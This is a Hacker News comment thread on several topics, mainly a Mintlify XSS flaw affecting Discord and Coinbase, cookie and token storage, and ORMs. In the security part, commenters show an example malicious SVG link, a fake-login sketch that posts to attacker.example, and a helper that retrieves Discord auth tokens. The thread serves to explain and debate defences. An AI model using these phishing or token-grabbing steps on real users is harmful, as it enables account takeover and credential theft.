Hacker News | superasn's comments

This works amazingly well. I started playing, and just 5 minutes in I was completely hooked; I ended up playing for almost half an hour.

It could be that I'm a bit old-school, but this really seemed to confirm that ready-to-play, fun gameplay trumps realistic graphics any day!


Vice City was originally planned as an add-on to GTA III. Development time was 18 months. Incredible that they put out such a great game in so little time.

Putting the nostalgia effect aside, I agree. The gameplay is the important part, and it's why I can still play SNES games to this day.

This is a pretty scary exploit, considering how easily it could be abused.

Imagine just one link in a tweet, support ticket, or email: https://discord.com/_mintlify/static/evil/exploit.svg. If you click it, JavaScript runs on the discord.com origin.

Here's what could happen:

- Your Discord session cookies and token could be stolen, leading to a complete account takeover.

- Attackers could read/write your developer applications & webhooks, allowing them to add or modify bots, reset secrets, and push malicious updates to millions.

- They could access any Discord API endpoint as you, meaning they could join or delete servers, DM friends, or even buy Nitro with your saved payment info.

- They could maybe even harvest OAuth tokens from sites that use "Login with Discord."

Given the potential damage, the $4,000 bounty feels like a slap in the face.

edit: just noticed that HN turned this into a clickable link - which makes it even scarier!


Doesn't stealing the cookies/token require a non-HttpOnly session cookie or a token in localStorage? Do you know that Discord puts its secrets in one of those insecure places, or was that just a guess?

I believe if you always keep session tokens in Secure, HttpOnly cookies, you are more resilient to this attack.
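i.e., something along these lines (the exact attribute set varies by app, of course):

  Set-Cookie: session=...; Secure; HttpOnly; SameSite=Lax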

I interviewed frontend devs last year and was shocked at how few knew about this stuff.


In general, if a script can run, users' sessions and, more importantly, their passwords are at risk.

It's true that an HttpOnly session cookie couldn't be taken directly, but it's trivial to present the user with a login screen and collect their password (and OTP), at which point you can easily establish a session remotely. It can look exactly like the regular login page, right down to the URL path (because the script can modify that without causing a page load).
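A minimal sketch of that technique (illustrative only; attacker.example is a stand-in):

  // make the address bar show the real login path without a page load
  history.replaceState(null, "", "/login");
  // then swap the page for a look-alike form that posts to the attacker
  document.body.innerHTML =
    '<form action="https://attacker.example/collect" method="POST">...</form>';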


Yep, httpOnly cookies just give the hacker a bit of extra work in some situations. TBH I don't even think httpOnly is worth the hassle it creates for platform developers given how little security it adds.

Wow, did not realize a URL could be set like that without prompting a page reload...

To be clear, only the path and query-parameter parts of the URL can change; the domain (and subdomain) stays intact.

Even scarier to me than the vulnerability itself is that Fidelity (which I personally think is a good bank and investment company) was using a third party that allowed injection - injection that could potentially steal a whole lot of money, affect markets, ruin or terminate billions of lives, and affect the course of humanity. What the fuck.

Their knowledge of finance is certainly better than their knowledge of web tech.

Historically and today.


That’s why I’m a Schwab junkie… but finance is a hotspot for this kind of stuff.

If it weren't already in the same domain you wouldn't be able to read a non-HttpOnly cookie anyway, so that's moot.

Well, that's how SPAs (single-page applications) work.

How do you modify the url exactly?


`history.replaceState(null, "", "/login")`

For Coinbase docs in particular, this is a disaster.

By the looks of it, their docs are under a subdomain, and no part of the domain can be changed when setting the URL this way. So it would still look at least a little out of place.

I mean, you're not wrong, but this is going to trick a non-zero number of people and that's not okay. We should expect more out of companies like Coinbase and hold them to a high standard.

This is unacceptable and the amount offered in general is low. It feels like we can agree on this.


Auth URLs are almost always a shitshow at every larger corp. Having the URL be https://docs.bigcorp.com/sso/authlayerv1/us-east-24/aws/secu... would not stand out at all to anyone.

No, because Discord auth tokens don't expire soon enough. The only thing that kills them is changing your password. Idk why Discord doesn't invalidate them after some time; it is seriously amateur hour over there and has been for a while.

Probably because the end user hates logging in; my friends always complain about the "remember me" button being useless for some services.

No, these are tokens where you get a new one per request. If you open up dev tools and then open the user settings panel, you will see that you get a new one every single time. They never expire - or at least, for years they were insanely long-lived.

If you set the cookie header right (definitely not always the case), this is true, but the JavaScript can still send requests that will have that cookie included, effectively letting the hacker use the session as the logged-in user

with http-only they can't _steal_ the cookie, but they can still _use_ the cookie. It reduces the impact but doesn't fully solve it.
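For example, an injected script can still do something like this (a sketch; the endpoint path is just for illustration), and the browser attaches the HttpOnly cookie on its own:

  // the script never reads the cookie; the browser sends it automatically
  const res = await fetch("/api/v9/users/@me", { credentials: "include" });
  const me = await res.json(); // now acting as the logged-in user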

Discord puts the authentication token in local storage

Is that a problem on its own? It's like, encrypted right? Maybe a time sensitive token?

Not a problem in itself. Also, there's not much point in encrypting tokens. The attacker could use the encrypted token to authenticate themselves without having to decrypt it. They could just make a request from the victim's own browser. They could do this with cookies too, even HttpOnly ones.

XSS is a big problem. If a hacker can inject a script into your front end and make it execute, it's game over. Once they get to that point, there's an infinite number of things they can do. They basically own the user's account.


Does anyone actually encrypt the contents of JWTs? I'd have thought that anyone who has concerns about the contents of the token being easily visible would be likely to avoid JWTs anyway and just use completely opaque tokens?

Encrypted tokens are opaque but they are also offline-verifiable. A simple opaque token has to be verified online (typically, against a database) whenever it's used.

Auth0, for example, supports JWE for its access tokens: https://auth0.com/docs/secure/tokens/access-tokens/json-web-...


JWT supports some encryption algorithms as an alternative to signatures but my experience is that most people like to keep it simple.

JWT is intended for authentication. Most of the time you're basically just signing a token containing an account ID and nothing else... Sometimes a list of groups but that only scales to a small number of groups.


Depends on the token; JWTs usually have payloads that are only base64 encoded. Also, if there's a refresh token in there, it can be used to generate more tokens until invalidated (assuming invalidation is built in).
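e.g., given a signed (JWS, not encrypted JWE) token in `token`, the payload decodes with nothing more than:

  // base64url -> base64, then decode the middle segment as JSON
  const payload = JSON.parse(
    atob(token.split(".")[1].replace(/-/g, "+").replace(/_/g, "/"))
  );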


You may be thinking of CSRF mitigations. XSS exploits are more dangerous and can do more than steal sessions.

As a FE dev, I wouldn't be able to articulate what you just did in the way you did, but it is something I know in practice, just from experience. I don't think any of the FE courses I took tackled anything like that.

Token stealing hasn't been a real danger for a decade now. If your tokens aren't kept in HttpOnly cookies, you're doing something explicitly wrong, because 99% of backends nowadays do this for you.

with http-only they can't _steal_ the cookie, but they can still _use_ the cookie. It reduces the impact but doesn't fully solve it.

Surely, if a script is in a position to sniff the cookie from local storage, it can also indirectly use the HttpOnly cookie by making a request from the browser. So really not much of a difference, as they will be taking over the account either way.

Cookie storage and local storage are by no means the same thing! Cookies are not stored in local storage, and they can be HttpOnly, so they are not directly accessible from JavaScript. Nevertheless, as described above, with this XSS attack it is easy to bypass the token entirely and just steal the user's credentials by presenting a fresh login form while keeping the origin domain intact. That's why XSS attacks have been dangerous since their inception. Nothing new, actually.

The fact that it is just so trivial and obvious is what's scary. It didn't even require any real hacking chops, just patience: literally anyone with a cursory knowledge of site design could have stumbled on this if they were looking.

Terrifying.


>the $4,000 bounty feels like a slap in the face.

And serves as a reminder that crime does pay.

In the black market, it would have been worth a bit more.


I was once only given $1,000 for an exploit where I could put in npm usernames and get their email addresses. Big corps don't always pay what they should.

yeah, but nothing pays as much as doing free work for (checks notes) Mintlify, it feels

No it would not have been.

This specific XSS vulnerability may not have been, but the linked RCE vulnerability found by their friend https://kibty.town/blog/mintlify/ certainly would've been worth more than the $5,000 they were awarded.

A vulnerability like that (or even a slightly worse XSS that allowed serving JS instead of only SVG) could've let them register service workers for all visiting users, giving them future XSS ability at any time, even after the original RCE and XSS were patched.


Maybe? I don't know enough about the vulnerability. Is it serverside? Then it isn't worth very much.

>i quickly realised that this was the server-side serverless (lol) environment of their main documentation app, while this calls to a external api to do everything, we have the token it calls it with in the env.

>alongside, we can poison the nextjs cache for everyone for any site, allowing mass xss, defacing, etc on any docs site.


So it's a serverside bug that basically creates a more-severe stored DOM corruption vulnerability? Yeah, that's not worth anything to any buyer of vulnerabilities that I know exists. Maybe you know ones that I don't know.

I can’t speak to the value of the vulnerability as I lack the universal Rolodex of Every Exploit Buyer that is apparently available (nor am I interested in debating this with somebody that admitted they didn’t know anything about the vulnerability, declared it worthless anyway, and then moved the goalposts after a core assumption about it was trivially shown to be wrong. I’m fairly certain at this point these kids could recreate the end of the movie Antitrust and there’d be a thread somewhere with tptacek posting “This isn’t that big of a deal because”).

I just saw that you asked if the article about the server-side exploit was about a server-side exploit. It is. It’s right there in the post.


Can I ask which exploit buyers you are aware of? None of us know all of them! It'll be easier to discuss this with a specific buyer in mind.

Could you elaborate on why not?

What 'arcwhite said (sorry, I got dragged into a call).

1. The exploits (not vulnerabilities; that's mostly not a thing) that command grey/black market value all have half-lives.

2. Those exploits all fit into existing business processes; if you're imagining a new business, one that isn't actively running right now as we speak (such as you'd have to do to fit any XSS in a specific service), you're not selling an exploit; you're planning a heist.

3. The high-dollar grey market services traffic exclusively in RCE (specifically: reliable RCE exploits, overwhelmingly in mainstream clientside platforms, with sharp dropoffs in valuation as you go from e.g. Chrome to the next most popular browser).

4. Most of the money made in high-ticket exploit sales apparently (according to people who actually do this work) comes on the backend, from tranched maintenance fees.


There's generally no grey market for XSS vulns. The people buying operationalized exploits generally want things that they can aim very specifically to achieve an outcome against a particular target, without that target knowing about it, and operationalized XSS vulns seldom have that nature.

Your other potential buyers are malware distributors and scammers, who usually want a vuln that has some staying power (e.g. years of exploitability). This one is pretty clearly time-limited once it becomes apparent.


It would have been. Ten times the amount at least.

For a reflected XSS? Tell me who is paying that much for such a relatively common bug...

To elaborate: to exploit this you have to convince your target to open a specially crafted link, which would look very suspect. The most realistic way to exploit it would be to send a shortened link and hope they click on it, that they are logged into discord.com when they do (most people use the app), that there are no other security measures (HttpOnly cookies), etc.

No real way to use this to compromise a large number of users without more complex means


It isn't about the commonality of the bug, but about the level of access it gets you, or the massive scale of the target. This bug on your blog? Who cares. This bug on Discord or AWS? Much more attractive and lucrative.

Yes, but this is not a particularly high access level bug.

Depending on the target, it's possible that the most damage you could do with this bug is a phishing attack where the user is presented with a fake sign-in form (on a sketchy URL)

I think $4k is a fair amount; I've done HackerOne bounties too, and we got less than that years ago for a Twitter reflected XSS


Why would that be the maximum damage? This XSS is particularly dangerous because you are running your script on the same domain where the user is logged in, so you can pretty much do anything you want under their session.

In addition this is widespread. It's golden for any attacker.


Because modern cookie directives and browser configs neuter a lot of the worst XSS outcomes/easiest exploit paths. I would expect all the big sites to be setting them, though I guess you never know.

I would not be as confident as you. In their first example, they show Discord, and the XSS code is executed directly on discord.com under the logged-in account (some people actually use the web version of Discord to chat, or sign in on the website for whatever reason).

If you have a high-value target, it is a great opportunity to use such exploits, even for single shots (it would likely not be detected anyway since it's a drop in the ocean of requests).

Spreading it across the whole internet is not a good strategy, but for 4,000 USD, being able to target a few users is great value.

Besides XSS, phishing has its own opportunity.

Example: Coinbase is affected too, though on the docs subdomain, and there is 2-step verification, so you cannot do transactions directly. But if you just replace the content with a "Sign in to Coinbase / Follow this documentation procedure / Download update" page, this can get very, very profitable.

Someone would pay 4,000 USD to receive 500,000 USD back in stolen bitcoins.

Still, purely by executing things under the user's session, there are interesting things to do.


> some people actually use web version of Discord to chat, or sign-in on the website for whatever reason

Beside this security blunder on Discord's part, I can see only upsides to using a browser version rather than an Electron desktop app. Especially given how prone Discord is to data mining its users, it seems foolish to let them out of the web sandbox and onto your system.


Again, here you have not so much sold a vulnerability as you have planned a heist. I agree, preemptively: you can get a lot of money from a well-executed heist!

Do you want to execute actions as a logged-in user on high-value website XXX?

If yes -> very useful


Nobody is disputing that a wide variety of vulnerabilities are "useful", only that there's no market for most of them. I'd still urgently fix an XSS.

There is a market outside Zerodium: Telegram. Finding a buyer takes time and trust, but it definitely has higher value than 4k USD because of its real-world impact, no matter that it scores lower technically on CVSS.

Really? Tell me a story about someone selling an XSS vulnerability on Telegram.

("The CVSS chart"?)

Moments later

Why do people keep bringing up "Zerodium" as if it's a thing?


I understand your perspective about the technical value of an exploit, but I disagree with the concept that technical value = market value.

There are unorganized buyers who may be interested if they see potential to weaponize it.

In reality, if you want to maximize revenue, yes, you need to organize your own heist (if that's what you meant)


Do you know this or do you just think it should be true?

> understand your perspective about the technical value of an exploit

Going out on the world’s sturdiest limb and saying u/tptacek knows the technical and trading sides of exploits. (Read his bio.)


As I understand it, this feature is SSS, not XSS, so XSS protections don't apply.

How would you make money from this? Most likely via phishing. Not exactly a zero-click RCE.

What happens in all these discussions is that we stealthily transition from "selling a vulnerability" to "planning a heist", and you can tell yourself any kind of story about planning a heist.

Also the XSS exploit would have been dead in the water for any sites using CSP headers. Coinbase certainly uses CSP. With this in place an XSS vuln can't inject arbitrary JS.
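A minimal example of such a header (the exact policy varies per site):

  Content-Security-Policy: script-src 'self'; object-src 'none'

With a policy like that, inline scripts and scripts from other origins are refused by the browser unless explicitly allowed.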

I don't like tptacek, but it's insane to not back up this comment with any amount of evidence or at least explanation. The guy knows his shit.

Hey I was wrong about Apple downthread.

> - Your Discord session cookies and token could be stolen, leading to a complete account takeover.

Discord uses HttpOnly cookies (except for the cookie consent banner).


Tokens are stored in localStorage, which is accessible from JS

Well, it used to be much more accessible; now you have to do some hack to retrieve it, and by hack I mean some "window.webpackChunkdiscord_app.push" kind of hack - no longer your usual retrieval. Basically you have to get the token from webpack. The localStorage one does not seem to work anymore. That is what I used, but now it does not work (or rather, not always). The webpack one seems to be reliably good.

So your code goes like:

  // getLocalStorageItem / getTokenFromWebpack are my own helpers
  async function getToken() {
    // Try localStorage first
    const token = getLocalStorageItem('token')
    if (token) return token

    // Try webpack if localStorage fails
    const webpackToken = await getTokenFromWebpack()
    if (webpackToken) return webpackToken

    return null
  }
and localStorage does fail often now. I knew the reason for that at some point (something about them removing it when you load the website?), so you need the webpack way, which is consistently reliable.

I believe if you search for the snippet above, you can find the code for the webpack way.


Discord removes the token from localStorage when the web app is open and it's in app memory, and places it back when you close the tab using the "onbeforeunload" event.
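Roughly like this (a sketch of the described behavior, not Discord's actual code):

  // on load: pull the token into memory, then hide it from localStorage
  const token = localStorage.getItem("token");
  localStorage.removeItem("token");

  // on close: write it back so the next visit can find it
  window.addEventListener("beforeunload", () => {
    localStorage.setItem("token", token);
  });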

Yeah, that is what I have observed, too.

You can retrieve it the webpack way though.


Great job on this release! I've been waiting for something like it since my favorite browser, Kiwi, stopped getting updates.

Without updates, many sites will likely stop working with it soon.

Kiwi had some great features, like disabling AMP mode, rearranging the Chrome Store for mobile, and customizable tab layouts, etc. These features might interest others as well.


I miss kiwi.


Yes, I'd be interested too. I'm still using Kiwi Browser but afraid it will stop working soon.

I did recently see a "this browser is unsafe" warning when trying to open Gmail in it, so any up-to-date Chromium-based alternative would be amazing!


I still (unfortunately) am stuck with kiwi as well. I use it almost exclusively for a few webapps that use large amounts of indexeddb storage (>10gb) without a working export method[1]. With Firefox, I was able to export this data with devtools over ADB[2] to another Firefox install.

I really wish someone would create an indexeddb shim that interfaces with another system and only uses indexeddb for (very large) cache. Something I could drop in with a userscript would be lovely, even if it required running a local server with something like rsync or rclone responsible for the actual transfers.

[1]: dexie import/export used to work; now it never returns. I have no way of verifying that it's doing nothing without putting it in the background (thus suspending it...), but I've let it run for 3 hours with no results.

[2]: Firefox doesn't allow backing up app data for some reason, but devtools functions allow reading and writing the profile directory through terminal commands (zip the profile directory; unzip and restart the browser).


I agree with this take. Product Hunt felt like it was chasing short-term goals instead of building something sustainable. They also allowed, and sometimes encouraged, behavior that undermined the quality of the site.

The last time I used it, one of the common hacks was adding 50 makers to a single app launch. PH also openly condoned mass email blasts and tweets to drive votes, which just rewarded whoever could push the hardest on promotion.

In contrast, Hacker News discourages asking people for upvotes and even treats it as a negative if you do. That long-term focus on signal over hype is probably why HN still feels useful today while PH lost its way.


Thanks for the helpful reply! As I wasn't able to fully understand it, I pasted your reply into ChatGPT and asked it some follow-up questions; here is what I understand from that interaction:

- Big models like GPT-4 are split across many GPUs (sharding).

- Each GPU holds some layers in VRAM.

- To process a request, weights for a layer must be loaded from VRAM into the GPU's tiny on-chip cache before doing the math.

- Loading into cache is slow; the ops themselves are fast.

- Without batching: load layer > compute user1 > load again > compute user2.

- With batching: load layer once > compute for all users > send to GPU 2, etc.

- This makes cost per user drop massively if you have enough simultaneous users.

- But bigger batches need more GPU memory for activations, so there's a max size.
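If I turn that into a toy cost model (illustrative only; numbers made up):

  // loading a layer's weights dominates; per-user math is cheap
  const LOAD = 100, COMPUTE = 1;
  const unbatched = (layers, users) => layers * users * (LOAD + COMPUTE);
  const batched = (layers, users) => layers * (LOAD + users * COMPUTE);
  console.log(unbatched(80, 32)); // 258560
  console.log(batched(80, 32));   // 10560 - roughly 24x cheaper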

This does make sense to me, but does it sound accurate to you?

Would love to know if I'm still missing something important.


This seems a bit complicated to me. They don't serve very many models. My assumption is they just dedicate GPUs to specific models, so the model is always in VRAM. No loading per request - it takes a while to load a model in anyway.

The limiting factor compared to local is dedicated VRAM - if you dedicate 80GB of VRAM locally 24 hours/day so response times are fast, you're wasting most of the time when you're not querying.


Loading here refers to loading from VRAM into the GPU's core cache; loading from VRAM is so slow in terms of GPU time that GPU cores end up idle most of the time, just waiting for more data to come in.


Thanks, got it! I think I need a deeper article on this - as the comment below says, you'd then need to load the request-specific state in instead.


Yeah, ChatGPT pretty much nailed it.


But you still have to load the data for each request. And in an LLM, doesn't this mean the WHOLE KV cache, because the KV cache changes after every computation? So why isn't THIS the bottleneck? Gemini is talking about a context window of a million tokens - how big would the KV cache for that get?


Pretty sure this is there to prevent this[1] from happening to them

[1] https://www.viberank.app/


That's a CO2 emissions leaderboard!


That’s almost no CO2 emissions at all. Here is a CO2 emissions leaderboard (need to sort by the correct column): https://celebrityprivatejettracker.com/leaderboard/


The number one has 32k, which is equivalent to 64,000 commercial transatlantic flights (per person). For reference, 2024 had a record summer of 140k flights.


A commercial transatlantic flight costs $0.50 per person?


For a moment I thought it might be the presidential plane, which would explain the emissions, but no, for some reason Trump's personal plane is a whole-ass Boeing 757


I'm surprised there hasn't been dick-swinging pressure for some billionaire (the type who can't remember how many billions, but whose net worth probably begins with a 1 due to Benford's law) to get a Dreamliner as their private jet.


Inference != training


Oh my god. That's insane.

The anti-AI people would be pulling their pitchforks out against these people.

Would there be any way of compiling this without people's consent? Looking at GitHub public repos, etc.?

I imagine a future where we're all automatically profiled like this. Kind of like perverse employee tracking software.


The pro-AI people are as well, as these people are all on the Claude Max plan, and they’re just burning through resources for internet lols, while ruining the fun for the rest of us. It’s the tragedy of the commons at work.


I like the concept, but the landing page is not good and far too heavy.

My browser just froze after scrolling halfway. Not sure if it's something to do with the scroll effects, but I really don't understand why this simple site is maxing out my CPUs.


Same. Using Mobile Safari on iPadOS on an M2 iPad Pro.


I'm not a fan of usage caps either, but that Reddit post [1] (“You deserve harsh limits”) does highlight a perspective worth considering.

When some users burn massive amounts of compute just to climb leaderboards or farm karma, it's not hard to imagine why providers might respond with tighter limits - not because it's ideal, but because that kind of behavior makes platforms harder to sustain and less accessible for everyone else. On the other hand, a lot of genuine customers are canceling because they get API overload messages after paying $200.

I still think caps are frustrating and often too blunt, but posts like that make it easier to see where the pressure might be coming from.

[1] https://www.reddit.com/r/ClaudeAI/comments/1lqrbnc/you_deser...


Let's not shift the blame for Anthropic's bait and switch onto 'bad users'.

Surely they thought about 'bad users' when they released this product. They can't be that naive.

Now that they have captured developer mindshare, users are bad.


> anthropic bait and switch

what was the bait and switch? where in the launch announcement (https://www.anthropic.com/news/max-plan) did they suggest it provided unlimited inference?


So where did 'bad users' come from, if users were simply doing what they were allowed to do?

Why is Anthropic tweeting about 'naughty users that ruined it for everyone'?


What are the commons? Why would a tragedy just appear there out of the blue?


I don't understand your comment.

they launched Claude Max (and Pro) as being limited. it was limited before, and it's limited now, with a new limit to discourage 24/7 maxing of it.

in what way was there a bait and switch?


are you going to answer what the bait and switch was?


Bait : "For 200$ a month you get to use Claude 20x more than what the Pro users are entitled to. You don't know how much exactly though, but neither do we. We may limit your usage with weekly and monthly limits. Sounds good?"

Switch: "We limited your usage weekly and monthly. You don't know how those limits were set, we do but that's not information you need to know. However instead of choosing to hoard your usage out of fear of hitting the dreaded limit again, you've kept it again and again, using the product exactly the way it was intended to and now look what you've done."


So there was no bait and switch; you are just complaining about the lack of transparency around the specific limits, which they never once said didn't exist


Always use ORMs and then spend the next year debugging N+1 queries, bloated joins, and mysterious performance issues that only show up in prod.

Migrations randomly fail, schema changes are a nightmare, and your team forgets how SQL works.

ORMs promise to abstract the database but end up being just another layer you have to fight when things go wrong.
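The classic N+1 shape, for anyone who hasn't been bitten yet (a Sequelize-style sketch; the models are made up):

  // one query for the posts...
  const posts = await Post.findAll();
  for (const post of posts) {
    // ...plus one hidden query per post
    const author = await post.getAuthor();
  }

  // versus a single eager-loaded query:
  const postsWithAuthors = await Post.findAll({ include: Author });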


People love to rant about ORMs.

But as someone who writes both raw SQL and uses ORMs regularly, I treat a business project that doesn’t use an ORM as a bit of a red flag.

Here’s what I often see in those setups (sometimes just one or two, but usually at least one):

- SQL queries strung together with user-controllable variables — wide open to SQL injection. (Not even surprised anymore when form fields go straight into the query.)

- No clear separation of concerns — data access logic scattered everywhere like confetti.

- Some homegrown "SQL helper" that saves you from writing SELECT *, but now makes it a puzzle to reconstruct the basic query that actually hits the database

- Bonus points if the half-baked data access layer is buried under layers of “magic” and is next to impossible to find.

In short: I'm not anti-SQL, but I am wary of people who think they need to hand-write everything in every application, including small ones with 5-50 simultaneous users.


People who avoid ORMs end up writing their own, worse ORM. ORMs are perfect if you know how and when to use them. They encapsulate a lot of the mind-numbing work that comes with raw SQL, such as writing inserts for a 50-column table.
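Compare, for instance (hypothetical 50-column users table; Sequelize-style on the ORM side):

  // ORM: columns mapped from the object's keys
  await User.create(userData);

  // raw SQL: 50 column names and 50 placeholders to keep in sync by hand
  await db.query(
    "INSERT INTO users (col1, col2 /* ...48 more */) VALUES ($1, $2 /* ... */)",
    [userData.col1, userData.col2 /* ... */]
  );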


100%. I once tried to optimize a SQL query by moving away from the ORM, so I could have more control over the query structure and performance.

I poorly implemented SOLID design principles, creating a complete mess of a SQL Factory, which made it impossible to reason about the query unless I had a debugger running and called the API directly.


I find that Claude writes boilerplate SQL very well, and is effectively an 'ORM' for me - I just get plain SQL for CRUD.

Complex queries I write myself anyway, so Claude fills the 'ORM' gap for me, leaving an easily understood project.


Writing is just half the job. Now try migrations, or even something as fundamental as "find references" on a column name. No, grep is not sufficient; most tables have fields called "id" or "name".


I did that once on a hobby project, accidentally. When I realized the corner I had painted myself into I abandoned it.


I'd say, pure SQL gives you a higher performance ceiling and a lower performance and security floor. It's one of these features / design decisions that require diligence and discipline to use well. Which usually does not scale well beyond small team sizes.

Personally, from the database-ops side, I know how to read quite a few ORMs by now and what queries they result in. I'd rather point out a missing annotation in some Spring Data Repository or suggest a better access pattern (because I've seen a lot of those, and how those are fixed) than dig through what you describe.


The best is when you use an orm in standard ways throughout your project and can drop down to raw sql for edge things and performance critical sections… mmmmm. :chefs kiss:


100%

If a dev thinks that all SQL can be written by hand then they probably haven’t worked with a complex application that relies on complex data.

A good question to ask them is: what problems do ORMs solve? Good answers are:

Schema Changes + migration

Security

Code Traceability (I have a DB field, where is it used)

Code Readability

Standardisation - easy hiring.

Separation of data layer logic and application layer logic.

Code organisation, most ORMs make you put methods that act on a table in a sensible place.


I like Django's ORM for its good schema migrations. Other "ORMs" people build often do not have a good story around that. So often it's because developers aren't experiencing the best ORMs they could.


Homegrown ORMs are universally terrible, and a lot of the anti-ORM crowd are really anti-homegrown-ORM.

I’ve used Django, SQLalchemy and Hibernate. All three have good migration stories.


I think people should go all-in on either SQL or ORMs. The problems you described usually stem from people who come from the ORM world trying to write SQL, and invariably introducing SQL injection vulnerabilities because the ORM normally shields them from these risks. Or they end up trying to write their own pseudo-ORM in some misguided search for "clean code" and "DRY" but it leads to homegrown magic that's flaky.


In Java, the sweet spot is JdbcTemplate. Projects based on JdbcTemplate succeed effortlessly while teams muddle through JPA projects.

It is not that JPA is inherently bad, it's just that such projects lack strong technical leadership.


I believe jOOQ is Java's database "sweet spot". You still have to think and code in a SQL-ish fashion (it's not trying to "hide" any complexity), but everything is typed, and it's very easy to convert returned records to objects (or collections of objects).


Sir, sqlc for example.

I know exactly what's going on, while getting some level of idiocy protection (talking about wrong column names, etc).


Poor developers use tools poorly, film at 11.

But seriously, yeah, every time I see a complaint about ORMs, I have to wonder if they ever wrote code on an "average team" that had some poor developers on it that didn't use ORMs. The problems, as you describe them, inevitably are worse.


ORMs can be the starting point; you can then optimize the queries manually with SQL where needed.

There's also the reality that no two ORMs are built the same way or to the same performance standard.


I'm wary of people who are against query builders in addition to ORMs. I don't think it's possible to build complicated search (multiple joins, searching by aggregates, chaining conditions together) without a query builder of some sort, whether it's homegrown or imported. Better to pull in a tool when it's needed than to leave your junior devs blindly mashing SQL together by hand.

On the other hand, I agree that mapping SQL results to instances of shared models is not always desirable. Why do you need to load a whole user object when you want to display someone's initials and/or profile picture? And if you're not loading the whole thing, then why should this limited data be an instance of a class with methods that let you send a password reset email or request a GDPR deletion?


At least when I see raw SQL, I know the author and I are on a level playing field. I would rather deal with a directory full of SQL statements that get run than some mysterious build tool that generates SQL on the fly and thinks it's smarter than me.

For example, I'm working on a project right now where I have to do a database migration. The project uses C# Entity Framework. I made a migration to create a table, realized I forgot a column, deleted the table, and tried to start from scratch. For whatever reason, Entity Framework refuses to let go of the memory of the original table and keeps creating migrations to restore it. I hate this so much.


You can use EF by writing the migrations yourself ("database first"). Also, whatever problem you have there seems to be easily fixed either by a better understanding of how EF's code generation works, or by more aggressive use of version control.


Their point is that they understand SQL and DBs. They shouldn't need to learn EF and all its footguns.


I think you should just create another migration with an ALTER TABLE that adds that column


All of this is solved by an SQL query builder DSL


> - Some homegrown “SQL helper” that saves you from writing SELECT *, but now makes it a puzzle to reconstruct a basic query in a database

>- Bonus points if the half-baked data access layer is buried under layers of “magic” and is next to impossible to find.

It’s really funny because you’re describing an ORM perfectly.


I don't know what kind of ORM you have used, but I probably wouldn't like it either.

My ORM does much more than those "SQL helper" classes, and it logs SQL nicely to the console or wherever else I ask it to.

And it is easy to find: just search for @Entity.


They're making the tongue-in-cheek observation that those who don't use an ORM end up reinventing one, poorly.


A bad ORM. Every application that accesses an SQL database contains an ad hoc, informally-specified, bug-ridden, slow implementation of half of an ORM.


You really want something that lets you write

  table=db.table("table1")
  table.insert({"col1": val1, "col2": val2})
at the very least, if you are really writing lots of INSERTs by hand I bet you are either not quoting properly or you are writing queries with 15 placeholders and someday you'll put one in the wrong place.

ORMs and related toolkits have come a long way since they were called the "Vietnam of Computer Science". I am a big fan of jOOQ in Java

https://www.jooq.org/

and SQLAlchemy in Python

https://www.sqlalchemy.org/

Note both of these support both an object <-> SQL mapper (usually with generated objects) that covers the case of my code sample above, and a DSL for SQL inside the host language which is delightful if you want to do code generation to make query builders and stuff like that. I work on a very complex search interface which builds out joins, subqueries, recursive CTEs, you name it, and the code is pretty easy to maintain.


I always see this sentiment here, but I just haven't experienced any of it in 14 years with the Django ORM.


My life is this in Django. Querysets have been passed around everywhere, and we've grown to 50 teams. Now, faced with ever-slower dev velocity due to intertwined logic, and reduced system performance from often wildly non-performant data access patterns, we have spent two years trying to untangle our knot of data access. That led to a six-month push, disrupting 80% of teams' roadmaps, to refactor so that ORM objects are no longer passed around but replaced with plain types or DTOs - which is what will finally allow us to migrate a core part of our database, something required for both product development and scaling needs.

Here's the thing: in five of the six companies I have worked at, this story is exactly the same. Python, Ruby, Elixir. Passing around ORM objects and mixing up boundaries leads to more interdependencies, slower velocity, and poor performance, until a huge push is required to fix it all.

Querysets within a domain seem fine, but when you grow, domains get redefined. Defining good boundaries is important. And it requires effort to maintain them.


I believe your case is not specific to Django ORM in particular but to the inherent complexity of various teams working together on a single project.

For greenfield projects, you have a chance of splitting the codebase into packages with each one having its own model, migrations and repository, and if you want to cross these boundaries, make it an API, not a Django model. For existing projects this is hard to do most of the time though.


One thing I thought was interesting about Django is that tools like Celery will "pickle" ORM objects when they really should be passing the objects' PKs.

The other interesting thing about Django is that you can subclass QuerySet to add things like .dehydrate() and .rehydrate(), which can do the translations between JSON-like data and ORM representations.

Then replace the model manager (in Django at least) with that queryset using queryset.as_manager().

If you're trying to decompose the monolith, this is a good way to start, since it makes it easier to decompose and recompose the ORM data.

The simplest can just be:

    def dehydrate(self) -> List[int]:
        # reduce the queryset to plain primary keys (cheap to serialize)
        return list(self.values_list("id", flat=True))

    def rehydrate(self, *pks) -> Self:
        # rebuild an equivalent queryset from previously dehydrated pks
        return self.filter(id__in=pks)


> 50 teams

At that scale any tool will break down without good architecture, ORM or not.


You've never had to use

  .extra()

?


Django has SQL logging so you can see what your queries will do! It's wild.


Hitting the database should be avoided in a web application; use keys as much as possible. All heavy objects should already be cached on disk.


That sounds like an awesome idea for a new, post-React web framework. Instead of simply packaging up an entire web SPA "application" and sending it to the client on first load, let's package the SPA app AND the entire database and send it all - eliminating the need for any server calls entirely. I like how you think!


I can unironically imagine legitimate use cases for this idea. I’d wager that many DBs could fit unnoticed into the data footprint of a modern SPA load.


Yes, probably a lot of storefronts could package up their entire inventory database in a relatively small (comparatively) JSON file, and avoid a lot of pagination and reloads. Regardless, my comment was, of course, intended as sarcasm.


Stream the db to the clients post page load and validate client requests against a cache on the server.


Make sure to post this idea all over the internet so that LLMs learn it and it will be even easier to exploit vibe-coded websites.


I like Ecto's approach in Elixir. Bring SQL to the language to handle security, and then build opt-in solutions to real problems in app-land, like schema structs and changesets. Underneath, everything is simple (e.g. queries are structs and remain composable), and at the driver layer it takes full advantage of the BEAM.

It's hard to find similarly mature and complete solutions. In the JS/TS world, I like where Drizzle is going, but there is an unavoidable baseline complexity level from the runtime and the type system (not to criticize type systems, but TS was not initially built with this level of sophistication in mind, and it shows in complexity, even if it is capable).


Ecto is a gold-standard ORM, in no small part because it doesn't eat your database, nor your codebase. It lives right at the intersection, and does its job well.


A couple of years ago I had an opportunity to fill a fullstack role for the first time in several years.

First thing I noticed was that I couldn't roll an SQL statement by hand even though I had a distinct memory of being able to do so in the past.

I went with an ORM and eventually regretted it because it caused insurmountable performance issues.

And that, to me, is the definition of a senior engineer: someone who realised that they've already forgotten some things and that their pool of knowledge is limited.


